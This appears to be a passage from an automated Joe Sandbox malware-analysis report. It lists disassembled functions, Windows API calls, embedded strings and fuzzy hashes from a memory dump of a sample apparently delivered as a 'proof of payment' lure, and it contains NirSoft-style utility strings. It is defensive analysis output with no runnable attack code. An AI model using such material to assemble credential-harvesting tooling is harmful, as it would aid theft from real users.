                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                      • String ID:
                                      • API String ID: 552707033-0
                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                      • memcpy.MSVCRT ref: 0040C11B
                                      • strchr.MSVCRT ref: 0040C140
                                      • strchr.MSVCRT ref: 0040C151
                                      • _strlwr.MSVCRT ref: 0040C15F
                                      • memset.MSVCRT ref: 0040C17A
                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                      • String ID: 4$h
                                      • API String ID: 4066021378-1856150674
                                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf
                                      • String ID: %%0.%df
                                      • API String ID: 3473751417-763548558
                                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                      • GetTickCount.KERNEL32 ref: 0040610B
                                      • GetParent.USER32(?), ref: 00406136
                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                      • String ID: A
                                      • API String ID: 2892645895-3554254475
                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                      • memset.MSVCRT ref: 0040DA23
                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                      • String ID: caption
                                      • API String ID: 973020956-4135340389
                                      • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                      • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf$wcscpy
                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                      • API String ID: 1283228442-2366825230
                                      • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                      • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcschr.MSVCRT ref: 00413972
                                      • wcscpy.MSVCRT ref: 00413982
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                      • wcscpy.MSVCRT ref: 004139D1
                                      • wcscat.MSVCRT ref: 004139DC
                                      • memset.MSVCRT ref: 004139B8
                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                      • memset.MSVCRT ref: 00413A00
                                      • memcpy.MSVCRT ref: 00413A1B
                                      • wcscat.MSVCRT ref: 00413A27
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                      • String ID: \systemroot
                                      • API String ID: 4173585201-1821301763
                                      • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                      • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscpy
                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                      • API String ID: 1284135714-318151290
                                      • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                      • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                      • String ID: 0$6
                                      • API String ID: 4066108131-3849865405
                                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004082EF
                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                      • memset.MSVCRT ref: 00408362
                                      • memset.MSVCRT ref: 00408377
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$ByteCharMultiWide
                                      • String ID:
                                      • API String ID: 290601579-0
                                      • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                      • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$wcslen
                                      • String ID:
                                      • API String ID: 239872665-3916222277
                                      • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                      • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$_snwprintfmemset
                                      • String ID: %s (%s)$YV@
                                      • API String ID: 3979103747-598926743
                                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadMessageProc
                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                      • API String ID: 2780580303-317687271
                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                      • wcslen.MSVCRT ref: 0040A6B1
                                      • wcscpy.MSVCRT ref: 0040A6C1
                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                      • wcscpy.MSVCRT ref: 0040A6DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                      • String ID: Unknown Error$netmsg.dll
                                      • API String ID: 2767993716-572158859
                                      • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                      • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      • wcscpy.MSVCRT ref: 0040DAFB
                                      • wcscpy.MSVCRT ref: 0040DB0B
                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                      • API String ID: 3176057301-2039793938
                                      • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                      • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • database is already attached, xrefs: 0042F721
                                      • too many attached databases - max %d, xrefs: 0042F64D
                                      • database %s is already in use, xrefs: 0042F6C5
                                      • out of memory, xrefs: 0042F865
                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                      • unable to open database: %s, xrefs: 0042F84E
                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                      • API String ID: 1297977491-2001300268
                                      • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                      • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                      • memcpy.MSVCRT ref: 0040EB80
                                      • memcpy.MSVCRT ref: 0040EB94
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                      • String ID: ($d
                                      • API String ID: 1140211610-1915259565
                                      • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                      • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                      • GetLastError.KERNEL32 ref: 004178FB
                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastLockSleepUnlock
                                      • String ID:
                                      • API String ID: 3015003838-0
                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00407E44
                                      • memset.MSVCRT ref: 00407E5B
                                      • _mbscpy.MSVCRT ref: 00407E7E
                                      • _mbscpy.MSVCRT ref: 00407ED7
                                      • _mbscpy.MSVCRT ref: 00407EEE
                                      • _mbscpy.MSVCRT ref: 00407F01
                                      • wcscpy.MSVCRT ref: 00407F10
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                      • String ID:
                                      • API String ID: 59245283-0
                                      • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                      • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                      • GetLastError.KERNEL32 ref: 0041855C
                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                      • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                      • GetLastError.KERNEL32 ref: 0041858E
                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
